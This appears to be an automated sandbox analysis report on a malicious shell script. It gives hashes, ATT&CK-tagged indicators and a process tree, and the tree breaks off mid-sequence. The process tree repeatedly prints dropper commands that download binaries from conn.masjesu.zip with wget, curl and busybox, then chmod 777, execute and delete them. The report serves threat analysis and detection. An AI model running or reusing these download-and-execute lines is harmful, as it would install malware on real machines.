702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b

General

Target

702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Size

10KB
MD5

b5f00b34167fe96b81dc9665e6270fa1
SHA1

85c7e0bcb2347c19116b2c25edec820fb146b6d0
SHA256

702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b
SHA512

7b946d54011a2a0dab5d02d954062d55468a624a8efa18baba4d31e0c99bfba3592a845cf51555e4ffa0078bcb1aa5f3aa7bacd25f492cfdc17793d6c6c0bdbf
SSDEEP

192:SBfFdewQdKWQGeqVwYjPmOhkwkpzmOhkwEfAwQdKW6aeqVwYU:SBfFdewQdKWzPmOhkwkpzmOhkwEfAwQO

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 26 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
876	chmod
897	chmod
905	chmod
920	chmod
942	chmod
957	chmod
769	chmod
815	chmod
980	chmod
995	chmod
964	chmod
972	chmod
795	chmod
823	chmod
883	chmod
890	chmod
927	chmod
738	chmod
745	chmod
868	chmod
949	chmod
934	chmod
988	chmod
1003	chmod
830	chmod
913	chmod

Executes dropped EXE 26 IoCs

Processes:

xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBcZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33iYVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2Xx5IRyDO0ja8W3a47xLggyNGLRlejUrtGpKqRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m200cUyejdGjWDM9heC9D1Qq26iolWznBRbPsw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ28DAAydpSAIycpCBrauDN21eaP6XA4GmyGXalLzH81U3bjmtzkXTaResmVfAqdRlVeUGAiqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqzO3syGODeuVuUmfRARoqx7fQxHIsd3vigLpOk67j4X78Se3rofRDSLuxjkRN8MfEnCNOzhDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G13fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFdO3syGODeuVuUmfRARoqx7fQxHIsd3vigLpOk67j4X78Se3rofRDSLuxjkRN8MfEnCNOzhDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G13fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFdxq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBcZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33iYVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2Xx5IRyDO0ja8W3a47xLggyNGLRlejUrtGpKqRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m200cUyejdGjWDM9heC9D1Qq26iolWznBRbPsw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ28DAAydpSAIycpCBrauDN21eaP6XA4GmyGX

Reads runtime system information 27 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

busyboxwgetcurlbusyboxwgetcurlwgetcurlwgetwgetcurlcurlwgetcurlbusyboxbusyboxbusyboxbusyboxcurlcurlbusyboxwgetwgetcurlcurlcurlbusyboxcurlbusyboxwgetbusyboxcurlbusyboxwgetwgetcurlbusyboxwgetcurlbusyboxwgetwgetbusyboxwgetcurlcurlbusyboxwgetwgetwgetcurlbusyboxcurlbusyboxbusyboxwgetwgetbusyboxcurlbusyboxcurlwgetwgetcurl

pid	process
822	busybox
879	wget
910	curl
919	busybox
938	wget
969	curl
923	wget
1000	curl
1006	wget
834	wget
961	curl
894	curl
714	wget
720	curl
737	busybox
744	busybox
765	busybox
791	busybox
811	curl
931	curl
987	busybox
991	wget
826	wget
827	curl
873	curl
917	curl
979	busybox
820	curl
829	busybox
886	wget
941	busybox
954	curl
882	busybox
953	wget
976	wget
992	curl
814	busybox
872	wget
939	curl
875	busybox
909	wget
945	wget
971	busybox
984	wget
839	curl
880	curl
889	busybox
916	wget
960	wget
775	wget
782	curl
896	busybox
902	curl
956	busybox
994	busybox
819	wget
901	wget
912	busybox
924	curl
963	busybox
1007	curl
749	wget
804	wget
887	curl

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	curl
File opened for modification	/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	curl
File opened for modification	/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	curl
File opened for modification	/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	curl
File opened for modification	/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	curl
File opened for modification	/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA	curl
File opened for modification	/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz	curl
File opened for modification	/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	curl
File opened for modification	/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	curl
File opened for modification	/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	curl
File opened for modification	/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	curl
File opened for modification	/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	curl
File opened for modification	/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	curl
File opened for modification	/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	curl
File opened for modification	/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	curl
File opened for modification	/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	curl
File opened for modification	/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	curl
File opened for modification	/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	curl
File opened for modification	/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	curl
File opened for modification	/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	curl
File opened for modification	/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	curl
File opened for modification	/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	curl
File opened for modification	/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	curl
File opened for modification	/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	curl
File opened for modification	/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	curl
File opened for modification	/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	curl

/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
1⤵
PID:705

/bin/rm
/bin/rm bins.sh
2⤵
PID:709

/usr/bin/wget
wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- System Network Configuration Discovery
PID:714

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- System Network Configuration Discovery
PID:737

/bin/chmod
chmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- File and Directory Permissions Modification
PID:738

/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Executes dropped EXE
PID:739

/bin/rm
rm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
PID:740

/usr/bin/wget
wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
PID:741

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:744

/bin/chmod
chmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- File and Directory Permissions Modification
PID:745

/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Executes dropped EXE
PID:746

/bin/rm
rm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
PID:748

/usr/bin/wget
wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:749

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:765

/bin/chmod
chmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- File and Directory Permissions Modification
PID:769

/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Executes dropped EXE
PID:771

/bin/rm
rm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
PID:774

/usr/bin/wget
wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- System Network Configuration Discovery
PID:775

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:782

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- System Network Configuration Discovery
PID:791

/bin/chmod
chmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- File and Directory Permissions Modification
PID:795

/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Executes dropped EXE
PID:797

/bin/rm
rm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
PID:802

/usr/bin/wget
wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:804

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:814

/bin/chmod
chmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- File and Directory Permissions Modification
PID:815

/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Executes dropped EXE
PID:816

/bin/rm
rm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
PID:818

/usr/bin/wget
wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:819

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:822

/bin/chmod
chmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- File and Directory Permissions Modification
PID:823

/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
./200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Executes dropped EXE
PID:824

/bin/rm
rm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
PID:825

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:826

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:829

/bin/chmod
chmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- File and Directory Permissions Modification
PID:830

/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Executes dropped EXE
PID:831

/bin/rm
rm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
PID:833

/usr/bin/wget
wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- System Network Configuration Discovery
PID:834

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:865

/bin/chmod
chmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- File and Directory Permissions Modification
PID:868

/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Executes dropped EXE
PID:869

/bin/rm
rm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:871

/usr/bin/wget
wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:872

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:875

/bin/chmod
chmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- File and Directory Permissions Modification
PID:876

/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Executes dropped EXE
PID:877

/bin/rm
rm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
PID:878

/usr/bin/wget
wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- System Network Configuration Discovery
PID:879

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- System Network Configuration Discovery
PID:882

/bin/chmod
chmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- File and Directory Permissions Modification
PID:883

/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- Executes dropped EXE
PID:884

/bin/rm
rm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
PID:885

/usr/bin/wget
wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:886

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:889

/bin/chmod
chmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- File and Directory Permissions Modification
PID:890

/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Executes dropped EXE
PID:891

/bin/rm
rm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
PID:892

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:893

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- System Network Configuration Discovery
PID:896

/bin/chmod
chmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- File and Directory Permissions Modification
PID:897

/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Executes dropped EXE
PID:898

/bin/rm
rm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:900

/usr/bin/wget
wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- System Network Configuration Discovery
PID:901

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:904

/bin/chmod
chmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- File and Directory Permissions Modification
PID:905

/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Executes dropped EXE
PID:906

/bin/rm
rm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:908

/usr/bin/wget
wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:909

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:912

/bin/chmod
chmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- File and Directory Permissions Modification
PID:913

/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Executes dropped EXE
PID:914

/bin/rm
rm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
PID:915

/usr/bin/wget
wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:916

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:919

/bin/chmod
chmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- File and Directory Permissions Modification
PID:920

/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Executes dropped EXE
PID:921

/bin/rm
rm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
PID:922

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- System Network Configuration Discovery
PID:923

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:926

/bin/chmod
chmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- File and Directory Permissions Modification
PID:927

/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Executes dropped EXE
PID:928

/bin/rm
rm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:929

/usr/bin/wget
wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:930

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:933

/bin/chmod
chmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- File and Directory Permissions Modification
PID:934

/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Executes dropped EXE
PID:935

/bin/rm
rm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:937

/usr/bin/wget
wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:938

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:939

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:941

/bin/chmod
chmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- File and Directory Permissions Modification
PID:942

/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Executes dropped EXE
PID:943

/bin/rm
rm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
PID:944

/usr/bin/wget
wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- System Network Configuration Discovery
PID:945

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
PID:948

/bin/chmod
chmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- File and Directory Permissions Modification
PID:949

/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Executes dropped EXE
PID:950

/bin/rm
rm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
PID:952

/usr/bin/wget
wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:953

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:956

/bin/chmod
chmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- File and Directory Permissions Modification
PID:957

/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Executes dropped EXE
PID:958

/bin/rm
rm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
PID:959

/usr/bin/wget
wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:960

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:963

/bin/chmod
chmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- File and Directory Permissions Modification
PID:964

/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Executes dropped EXE
PID:965

/bin/rm
rm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
PID:967

/usr/bin/wget
wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
PID:968

